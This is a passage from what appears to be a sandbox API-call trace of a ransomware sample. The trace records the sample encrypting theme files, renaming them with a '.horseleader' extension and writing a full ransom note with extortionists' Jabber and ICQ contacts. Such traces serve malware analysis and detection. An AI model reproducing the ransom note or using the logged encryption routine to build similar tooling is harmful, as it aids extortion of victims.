Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM", lpSrch=".testttjffg") returned 0x0 [0247.698] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.698] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.700] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM") returned 81 [0247.700] StrStrW (lpFirst="RICEPAPR.ELM", lpSrch=".txt") returned 0x0 [0247.700] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=73822) returned 1 [0247.700] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.700] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.710] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.710] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.711] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x682f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.711] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.712] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.712] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.712] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xd05e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.712] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.712] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.712] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.712] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.712] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.713] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.713] CloseHandle (hObject=0x1a4) returned 1 [0247.713] GetProcessHeap () returned 0x780000 [0247.713] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.713] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM.horseleader") returned 93 [0247.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.elm.horseleader")) returned 1 [0247.716] GetProcessHeap () returned 0x780000 [0247.716] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.716] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x239, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RICEPAPR.INF", cAlternateFileName="")) returned 1 [0247.716] lstrcmpiW (lpString1="RICEPAPR.INF", lpString2="Windows") returned -1 [0247.716] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 81 [0247.716] StrStrIW (lpFirst="RICEPAPR.INF", lpSrch=".horseleader") returned 0x0 [0247.716] lstrcmpW (lpString1="RICEPAPR.INF", lpString2="#Decrypt#.txt") returned 1 [0247.716] lstrcmpW (lpString1="RICEPAPR.INF", lpString2="_uninstalling_.png") returned 1 [0247.716] lstrlenW (lpString=".testttjffg") returned 11 [0247.716] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF", lpSrch=".testttjffg") returned 0x0 [0247.716] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.717] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 81 [0247.717] StrStrW (lpFirst="RICEPAPR.INF", lpSrch=".txt") returned 0x0 [0247.717] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=569) returned 1 [0247.717] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x239, lpOverlapped=0x0) returned 1 [0247.719] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.719] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x239, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x239, lpOverlapped=0x0) returned 1 [0247.719] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.719] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.720] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.720] CloseHandle (hObject=0x1a4) returned 1 [0247.720] GetProcessHeap () returned 0x780000 [0247.720] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.720] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF.horseleader") returned 93 [0247.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.inf.horseleader")) returned 1 [0247.722] GetProcessHeap () returned 0x780000 [0247.722] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.722] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xcf7b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.722] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.722] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 81 [0247.722] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.722] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.723] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.723] lstrlenW (lpString=".testttjffg") returned 11 [0247.723] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.723] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.723] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.723] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.724] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 81 [0247.724] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.724] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=53115) returned 1 [0247.724] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.726] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.727] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.728] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.728] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.728] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.728] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2f7b, lpOverlapped=0x0) returned 1 [0247.729] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd085, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.729] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2f7b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2f7b, lpOverlapped=0x0) returned 1 [0247.729] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.729] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.729] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.730] CloseHandle (hObject=0x1a4) returned 1 [0247.730] GetProcessHeap () returned 0x780000 [0247.730] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.730] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.horseleader") returned 93 [0247.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.horseleader")) returned 1 [0247.731] GetProcessHeap () returned 0x780000 [0247.731] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.731] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xcf7b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.731] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.731] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\#Decrypt#.txt") returned 82 [0247.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.732] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.732] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.734] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.734] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.734] CloseHandle (hObject=0x158) returned 1 [0247.734] GetProcessHeap () returned 0x780000 [0247.734] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.734] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RIPPLE", cAlternateFileName="")) returned 1 [0247.734] lstrcmpiW (lpString1="RIPPLE", lpString2="Windows") returned -1 [0247.734] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE") returned 66 [0247.735] lstrcmpW (lpString1="RIPPLE", lpString2=".") returned 1 [0247.735] lstrcmpW (lpString1="RIPPLE", lpString2="..") returned 1 [0247.735] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.735] GetProcessHeap () returned 0x780000 [0247.735] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.735] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*") returned 68 [0247.735] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.735] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.735] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\.") returned 68 [0247.735] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.735] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.735] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.735] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\..") returned 69 [0247.736] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.736] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.736] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa2c, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.736] lstrcmpiW 